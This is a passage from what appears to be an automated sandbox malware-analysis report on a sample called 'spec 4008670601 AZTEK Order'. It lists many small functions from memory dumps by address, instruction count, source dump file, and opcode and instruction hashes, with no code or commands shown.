                                                      • Opcode Fuzzy Hash: 9b76ac455b5881d052c28cd5950d35e1cef383cca36535f322b701f530d92d67
                                                      • Instruction Fuzzy Hash: 0701D431610208CBCB188B35E40849ABFB7FFC8325B04457EE50683391DF71A815CB80
                                                      Function 06DA41CF Relevance: .0, Instructions: 44COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e6de80083c60c9ff12bfe4d541f8b7527b415880d4d14e12040b51128b20f9e
                                                      • Instruction ID: 7f1f216fbe51f8761fb53f8258a2a0dabe1bf166042a90c36a871b4f7c470208
                                                      • Opcode Fuzzy Hash: 1e6de80083c60c9ff12bfe4d541f8b7527b415880d4d14e12040b51128b20f9e
                                                      • Instruction Fuzzy Hash: 3801BC71704501DFC7419A78AA182597AD3EFC9346F0565A9E20AC7299DBB4E8428781
                                                      Function 06DA854E Relevance: .0, Instructions: 42COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c2600a8528817727c6d104f96cfc42fe2e49a593b188e8fb588062feb771c80
                                                      • Instruction ID: 9139b703b67b3fc3e84c5dd4a9fa651c2afc8b6ea1f326995db935329450a808
                                                      • Opcode Fuzzy Hash: 5c2600a8528817727c6d104f96cfc42fe2e49a593b188e8fb588062feb771c80
                                                      • Instruction Fuzzy Hash: 0FF0E935B08304235AF56B1A8D88A7F669DDFD44A0B180439FD2AC3340EF14DC4291F5
                                                      Function 06DA41E0 Relevance: .0, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58b1a3451f69fdf3cc88c6f9d357738be829733cf45298e192a9259a325538f3
                                                      • Instruction ID: df9f91f2a0370e9bd9d952f36673362c7094a9701e2e9d271a0158468838f5e1
                                                      • Opcode Fuzzy Hash: 58b1a3451f69fdf3cc88c6f9d357738be829733cf45298e192a9259a325538f3
                                                      • Instruction Fuzzy Hash: 6B01FF30304500CFC7549A38E91865A7BE7EBC9356B0161B9F20AC7356CFB0EC428781
                                                      Function 06DA1430 Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39ff719dc3ea7b105ece7e8092c52fd8a311d8179808295f369a559faa8ca31b
                                                      • Instruction ID: 2f6a70966f36175713100632448036df88ffb5d63c1117172ff5f7c28ba1c55b
                                                      • Opcode Fuzzy Hash: 39ff719dc3ea7b105ece7e8092c52fd8a311d8179808295f369a559faa8ca31b
                                                      • Instruction Fuzzy Hash: 56F046B2704B514BC7288B3F9C0466BBFEBEBC9295F09C53FD145C3210DAB0C5028690
                                                      Function 06DA6FEA Relevance: .0, Instructions: 40COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636e47ebfaadd292be2b9434e4e37b924a66ab0916eb03c1c252571a14642229
                                                      • Instruction ID: 82b8f9f42310136c144739c75607bb0e97c0efd0867fe9d295c6b68a90a639cc
                                                      • Opcode Fuzzy Hash: 636e47ebfaadd292be2b9434e4e37b924a66ab0916eb03c1c252571a14642229
                                                      • Instruction Fuzzy Hash: 5FF0B477B041186F9344DA6ADC84E67BBEEEBC86617158179F508C7305DA319C01C7A0
                                                      Function 06DAD068 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25f6c13540faab32a4807e781cfff1cad361ad77b1e45781528e2fe979f451ea
                                                      • Instruction ID: e110cba5516484a1eb16f62c0ec516b3b65cc1f368f4171b6cc396406166e533
                                                      • Opcode Fuzzy Hash: 25f6c13540faab32a4807e781cfff1cad361ad77b1e45781528e2fe979f451ea
                                                      • Instruction Fuzzy Hash: D201FB34A08208EFD744DFA9C659A6DBBF6AF48300F25C094E5099B766D730DE01DB80
                                                      Function 06DACFF0 Relevance: .0, Instructions: 39COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fccc0f7cefaad2b9d2ffa7edd53dcf2fcdc90507bab399f2a74dec805d36558
                                                      • Instruction ID: 84baa13e0cd6aa6643170c44065dd48ae9a2d7790f524b57183732f37412eb09
                                                      • Opcode Fuzzy Hash: 2fccc0f7cefaad2b9d2ffa7edd53dcf2fcdc90507bab399f2a74dec805d36558
                                                      • Instruction Fuzzy Hash: 51F0AF7090D308DFE744CF66D400ABDBBBAAF89301F00A2A5D0495B616C770CA42DB98
                                                      Function 06DA6F4C Relevance: .0, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f7e1a419e3f5a4720bc697740535ded7be06a4e1b6633988f9432a04294d1d0
                                                      • Instruction ID: 20a6708de8f3538ae00b4bdc4930ccfda6177c8b8c86e85e585faae8c22362c3
                                                      • Opcode Fuzzy Hash: 6f7e1a419e3f5a4720bc697740535ded7be06a4e1b6633988f9432a04294d1d0
                                                      • Instruction Fuzzy Hash: 05014870C04359DFDB51CF65C4043AEBAB1EF49360F298129E424AB290D774CA44CBD0
                                                      Function 06DADDF8 Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 726800f0bc4ea1ea91691183edfbbd45803f88f51f087f9706c8b840a3d0a0a4
                                                      • Instruction ID: 95e119603b15000a28be8a37339a7133de288ff0b8f84e5166841f13a92d240d
                                                      • Opcode Fuzzy Hash: 726800f0bc4ea1ea91691183edfbbd45803f88f51f087f9706c8b840a3d0a0a4
                                                      • Instruction Fuzzy Hash: 3B01D374D042499FCB80DFA8C585AAEFFF5BF08200F1081AAE954E3281D7349B40CBA1
                                                      Function 00B3D758 Relevance: .0, Instructions: 36COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 16b6044f6d597decf8412a8c19de706361d337ee36a943d10e5e020781f031d7
                                                      • Instruction ID: 18d03673871a565f0b443fc959dbd483a419cfa7c434232dbae557510cb2a70c
                                                      • Opcode Fuzzy Hash: 16b6044f6d597decf8412a8c19de706361d337ee36a943d10e5e020781f031d7
                                                      • Instruction Fuzzy Hash: EBF06271405344DEE7108B16DD84B62FFE8EF91724F28C55AED485B286C779AC44CAB1
                                                      Function 06DA6448 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 97fe4920f9114d759ce8049d14e77dcba195e6242f900661c619f9f063e8c78e
                                                      • Instruction ID: 09a8967ff3c6a58e4598032600d46afa31425253e2f4fe27779b3b8091e061c6
                                                      • Opcode Fuzzy Hash: 97fe4920f9114d759ce8049d14e77dcba195e6242f900661c619f9f063e8c78e
                                                      • Instruction Fuzzy Hash: D6F02731B241148F8B585B7DA42881A3AEA9FC826132440BAF605C7356DDB0DC018390
                                                      Function 06DA6438 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b71218db840b42b00865670cee9785c13f08ca2101e3516e4171539c41284e6e
                                                      • Instruction ID: e3ea4385b76128b283a6669edcfbff2082bf5a1badca7a21186874bd21cc05f8
                                                      • Opcode Fuzzy Hash: b71218db840b42b00865670cee9785c13f08ca2101e3516e4171539c41284e6e
                                                      • Instruction Fuzzy Hash: 7BF02777B241119BCB485F7CA45CA593BE69FD826231A45B7E505C7356DD70CC028780
                                                      Function 06DA6F58 Relevance: .0, Instructions: 34COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ee5efd9088acfe6d1e660378a649ff390d6e2352eaa590c44fdfb01135bc7ac5
                                                      • Instruction ID: 7da13a083a888e0b9a1a0954c4f2835d4cde8ca8e8b1c03e4b778271f1f64805
                                                      • Opcode Fuzzy Hash: ee5efd9088acfe6d1e660378a649ff390d6e2352eaa590c44fdfb01135bc7ac5
                                                      • Instruction Fuzzy Hash: 3301E870C04259DFDB54CF6AC4047AEBAF1EF48360F248629E824AA290D7748A44CBD0
                                                      Function 06DA1440 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0eefcf38144ac5b4acc50b6e374d026f4b0801ebcaa5ba1da3dd229e932feee2
                                                      • Instruction ID: 641a88f962b51269d3b8ed7d0309797202a228743846d48e20b86bcd9c80dc5b
                                                      • Opcode Fuzzy Hash: 0eefcf38144ac5b4acc50b6e374d026f4b0801ebcaa5ba1da3dd229e932feee2
                                                      • Instruction Fuzzy Hash: 5AF027717147554B83288A2F9C0452BBFEFEFC9295B09C83FE109C7220DAB0D90646D0
                                                      Function 06DA8190 Relevance: .0, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f25614941dce6830a47e1b6f68e92b0016fee6ca6aefec42ab4cf3a23149fe6a
                                                      • Instruction ID: 637be57b5b8e221b52cbd2d3b12163c1137ff4d3765a44ef5e0191f1c5252a10
                                                      • Opcode Fuzzy Hash: f25614941dce6830a47e1b6f68e92b0016fee6ca6aefec42ab4cf3a23149fe6a
                                                      • Instruction Fuzzy Hash: 3AF0E2316083486FCF45DF68DC508AA7FBAEF45214F0480ABF404DB262E630A910D764
                                                      Function 06DA6FF8 Relevance: .0, Instructions: 32COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f3a1574fff0b5084b4d8bc1bc2f064c76257c97fcfd34d8de87e0ad664da0d4
                                                      • Instruction ID: fde5016b13f2d964586104197f67a598c7399b6d0e452bca49918786d98fd28d
                                                      • Opcode Fuzzy Hash: 4f3a1574fff0b5084b4d8bc1bc2f064c76257c97fcfd34d8de87e0ad664da0d4
                                                      • Instruction Fuzzy Hash: 4BE039727042286F9304DA6ADC84D6BBBEEEBCC664321807AF508C7311DA319C0186A0
                                                      Function 06DA07B2 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 79b83d864a51900a72340d6d6d5ee8f72c42350d0851e006f067170f7a4ef0c3
                                                      • Instruction ID: cc18755dec949a4e6ece8ecbaa291ad13b73121c7517c0effab617fdcacaf1ec
                                                      • Opcode Fuzzy Hash: 79b83d864a51900a72340d6d6d5ee8f72c42350d0851e006f067170f7a4ef0c3
                                                      • Instruction Fuzzy Hash: D1F027B1A002148BCB488E79891519EBEA7AFC8290F06422EE402E33D8EEB0C91586C0
                                                      Function 06DAE608 Relevance: .0, Instructions: 27COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0ac4fa7ab19e47b621bee2fb45899e259c82d3e672c18d3e89709ad387186d2c
                                                      • Instruction ID: 7750563a6f58a8048aeea0a2bbac21327c7acc7caa34a0830363f7227723b048
                                                      • Opcode Fuzzy Hash: 0ac4fa7ab19e47b621bee2fb45899e259c82d3e672c18d3e89709ad387186d2c
                                                      • Instruction Fuzzy Hash: E1F0EC3080C308CBF7849BACC448BA97FB9EF84300F009925D50962261CF709945DB92
                                                      Function 06DABDF0 Relevance: .0, Instructions: 26COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a577a4dade2209cc421ea5476c03c516cc7df2b384a11e034a8d313e799e16e3
                                                      • Instruction ID: ae08b74a7a0b67de9727e261f331910891f3497f4ea3df35f87769fe66e77cd3
                                                      • Opcode Fuzzy Hash: a577a4dade2209cc421ea5476c03c516cc7df2b384a11e034a8d313e799e16e3
                                                      • Instruction Fuzzy Hash: 11F01574D08308EFCB40DFA8E405AADBBB8EB09301F1081AAE84893351D7319A61DF80
                                                      Function 06DA14B2 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e39852565147c6e4e8e66f3f7a4a8c568d416d050b8c6a4a6497b17cf69c0910
                                                      • Instruction ID: 99136d9e099111f71896317ea705a8ab08b4d0e1c51d0a7f036526675c3a7eeb
                                                      • Opcode Fuzzy Hash: e39852565147c6e4e8e66f3f7a4a8c568d416d050b8c6a4a6497b17cf69c0910
                                                      • Instruction Fuzzy Hash: 76E0D876B0451457D3145BA9DD057277FDAEFC9711F1A80AEE019D3789DD30DC018690
                                                      Function 06DA14C0 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e46d00b8c3683e84be9950732f3529fbf2c0076867f2905f8afc3bbd2483a08
                                                      • Instruction ID: cacb7c836a442a42e873aa0463676832dc615563aa5aa61b1cc0741d4a4ffe98
                                                      • Opcode Fuzzy Hash: 0e46d00b8c3683e84be9950732f3529fbf2c0076867f2905f8afc3bbd2483a08
                                                      • Instruction Fuzzy Hash: 3BE0863170051467D6145A6B9C04A2BBBEEEFC9B20B14C06DE519D3345CD706C0186D4
                                                      Function 06DA4182 Relevance: .0, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb02615641a9f092788e2acb9723d1e2980f18dbbb66fee0f65ed94fda81ec31
                                                      • Instruction ID: 634e7eb58651e4720d9625c577fd49491f7a29f6539a01f4ec93a0ba9c00673c
                                                      • Opcode Fuzzy Hash: eb02615641a9f092788e2acb9723d1e2980f18dbbb66fee0f65ed94fda81ec31
                                                      • Instruction Fuzzy Hash: C7E092757105148FC744EBBCE45C9163FE5DF8866171181E8F505C779AEE60AC018B90
                                                      Function 06DAF670 Relevance: .0, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6edbb31f6be1f5588ad0ce898801fa62bcd8937233302c4a262b8623c878338e
                                                      • Instruction ID: c787d00c0357f745d03436e03e19cd95343e80704f7d8db1d70e935c8c61b02e
                                                      • Opcode Fuzzy Hash: 6edbb31f6be1f5588ad0ce898801fa62bcd8937233302c4a262b8623c878338e
                                                      • Instruction Fuzzy Hash: 5FF01534E0020CABCB50EFA8D44968DBBB5EF88301F1081AAA804A2350EB359A50DF91
                                                      Function 06DA4190 Relevance: .0, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4c5f6757ccad856adac7761a51c2dd33b72aa7ba0a826be252705887758761bc
                                                      • Instruction ID: e448c82918e9f34a76361758ba8571fce405d9b374a5d614a8a389564bbdd268
                                                      • Opcode Fuzzy Hash: 4c5f6757ccad856adac7761a51c2dd33b72aa7ba0a826be252705887758761bc
                                                      • Instruction Fuzzy Hash: 1EE086313205148F8344EB6CE4189167FF5AF8C66031081A4F509C7355DE70AC418B90
                                                      Function 06DA50CE Relevance: .0, Instructions: 18COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d2cd226f7fad09defa2f5cf3e7202ca142489c07bfe9efbc05d2e3fb519ecab1
                                                      • Instruction ID: c8811f1c488c1079cd6c7e5aaef14f04b4dc44b9ac5e624d42f8deea248a5da8
                                                      • Opcode Fuzzy Hash: d2cd226f7fad09defa2f5cf3e7202ca142489c07bfe9efbc05d2e3fb519ecab1
                                                      • Instruction Fuzzy Hash: A6D05232E082089FCB409BA8F8488ECBB70EB8A212B004422D112E3210D3308815CAC8
                                                      Function 06DA8169 Relevance: .0, Instructions: 17COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: eb91af37a8938d56179d8be3ef7bab104134caa36d47fa16e1729ca788179c94
                                                      • Instruction ID: 9c2786df2007906fca4cff5d43b3601447d48735b9a41712326700c5c56e2edb
                                                      • Opcode Fuzzy Hash: eb91af37a8938d56179d8be3ef7bab104134caa36d47fa16e1729ca788179c94
                                                      • Instruction Fuzzy Hash: 50D017B714E3C14FE38667B0491821A3F30CB92381B1B44E686A48A2A3D4158515D332
                                                      Function 06DA3ADF Relevance: .0, Instructions: 12COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa6e0b09c834d35a64b2294bcc65825688869a30a1f0bbe1ac57d771f637c43c
                                                      • Instruction ID: 55f46c11e019baf6e0f7b72403dcff723264d116b34d7f6e6a425364a32c3f12
                                                      • Opcode Fuzzy Hash: aa6e0b09c834d35a64b2294bcc65825688869a30a1f0bbe1ac57d771f637c43c
                                                      • Instruction Fuzzy Hash: EAC01235049291DDDA459B708898C967F75EF56300B45C856D1C4471A2C620D01FDB65
                                                      Function 06DAA980 Relevance: .0, Instructions: 10COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bf24dc98f822ef70ceaf69517432a3f71fb4408bf44e5e980f0f69f0f1f3f79
                                                      • Instruction ID: 54a04ec03ae6d587f592dcb002bc1bbcea8b640ebc974454f79ea014e81d5040
                                                      • Opcode Fuzzy Hash: 1bf24dc98f822ef70ceaf69517432a3f71fb4408bf44e5e980f0f69f0f1f3f79
                                                      • Instruction Fuzzy Hash: 49C08C300143088BD32027B0B40E328BF68BB00202FC40211A409000B24FB48850D693
                                                      Function 06DA5470 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3c2d961faf1be71b8b09af7ff7064b6b981980a42662710bdb1717191f748497
                                                      • Instruction ID: 3d36056c6fc913f29e88e094174fab2457be45218999b01028dd6b4d4809f7d2
                                                      • Opcode Fuzzy Hash: 3c2d961faf1be71b8b09af7ff7064b6b981980a42662710bdb1717191f748497
                                                      • Instruction Fuzzy Hash: 16D0EA74D08309CFDB40CF94E5596EDBBB5AB59302F208015E45AA2281CBB4AA428F80
                                                      Function 06DA68D0 Relevance: .0, Instructions: 9COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fd6d36729a70b5ae06ded9129a01ca67b9e07cf2da263bf31effb920118933cf
                                                      • Instruction ID: 7fb4a005ec7044a3b43760298e2fa6af3a377ef5ee13546fb739d9c79eede046
                                                      • Opcode Fuzzy Hash: fd6d36729a70b5ae06ded9129a01ca67b9e07cf2da263bf31effb920118933cf
                                                      • Instruction Fuzzy Hash: E3C08C7B8083056ECB429FB0CA4AE42BFA2EFA4300F4684A9D050CA876D621C126FB11
                                                      Function 06DA728C Relevance: .0, Instructions: 8COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc91bd600214e2d4393c9babb49d00b252a5eb671cd012982bd640424177464c
                                                      • Instruction ID: 1add8586ab7e54b6c7cb3afd8b6a275a607b70c9549c5a5803880ab652141198
                                                      • Opcode Fuzzy Hash: fc91bd600214e2d4393c9babb49d00b252a5eb671cd012982bd640424177464c
                                                      • Instruction Fuzzy Hash: 30B0123A1AD300E5A1852F784CC0A3F7C20EFB1740F809D8D7B6500081C9B18474A62F
                                                      Function 06DA2C34 Relevance: .0, Instructions: 7COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
